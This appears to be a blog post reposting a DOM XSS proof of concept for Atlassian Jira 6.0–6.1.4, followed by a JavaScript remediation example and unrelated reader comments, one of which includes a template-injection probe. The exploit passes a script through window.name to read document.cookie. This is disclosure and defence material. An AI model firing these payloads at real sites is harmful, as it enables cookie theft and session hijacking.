DOM XSS (Cross-Site Scripting) is a medium-critical vulnerability specific to web applications. This attack allows malicious scripts to be injected directly into a web page's Document Object Model (DOM), putting users at risk. Prompt identification and remediation of this vulnerability are essential to safeguarding a web application's integrity and security.
Proof of Concept
# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date: 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Blog: www.TinKode.com
Vulnerable code
# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">
  <h1>${name}</h1>
</div>
Exploit
<html>
<script>
var victim = window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
</script>
</html>
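The remediation for the pattern above, as an added example that is not part of the original post and not Atlassian's code: the header template is shown unescaped next to a version that encodes the value at the sink, plus an allowlist check on window.name. The function names and the allowlist policy are assumptions made for illustration.

```javascript
// Added example, not Jira's code. All function names are hypothetical.

// Mirrors the page's template: the value lands in the markup unescaped.
function renderHeaderUnsafe(name) {
  return '<div class="aui-page-header-main"><h1>' + name + '</h1></div>';
}

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the characters that can open a tag, an attribute value or an entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened form: same markup, value encoded at the sink.
// In a browser, assigning the value to h1.textContent has the same effect.
function renderHeaderSafe(name) {
  return '<div class="aui-page-header-main"><h1>' + escapeHtml(name) + '</h1></div>';
}

// window.name is chosen by whoever opened the window and survives
// cross-origin navigation, so it is untrusted input. Assumed policy: the
// application only uses short identifiers; anything else is cleared.
const ALLOWED_NAME = /^[A-Za-z0-9_-]{0,64}$/;
function readWindowName(win) {
  const name = typeof win.name === 'string' ? win.name : '';
  if (ALLOWED_NAME.test(name)) return name;
  win.name = ''; // drop the opener-supplied value
  return '';
}

// Constructed sample: the window name used in the page's proof of concept.
const sample = { name: '<script>alert(document.cookie);<\/script>' };
console.log(renderHeaderUnsafe(sample.name)); // markup reaches the page intact
console.log(renderHeaderSafe(sample.name));   // rendered as inert text
console.log(JSON.stringify(readWindowName(sample))); // cleared by the allowlist
```

Encoding at the sink is the actual fix; the allowlist is defence in depth for code that reads window.name elsewhere.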
Nice
But what is this?
nice
Nice
I have a problem, and it goes like this:
A few years ago I created a Google account and uploaded a picture of myself, and now I want to delete it.
How can I delete that picture if I no longer have access to the account?
You can't delete it if you don't have access to the account.
Great post, I don't know much programming but this seems interesting.
It seems to be SSTI.... ${{9*9}}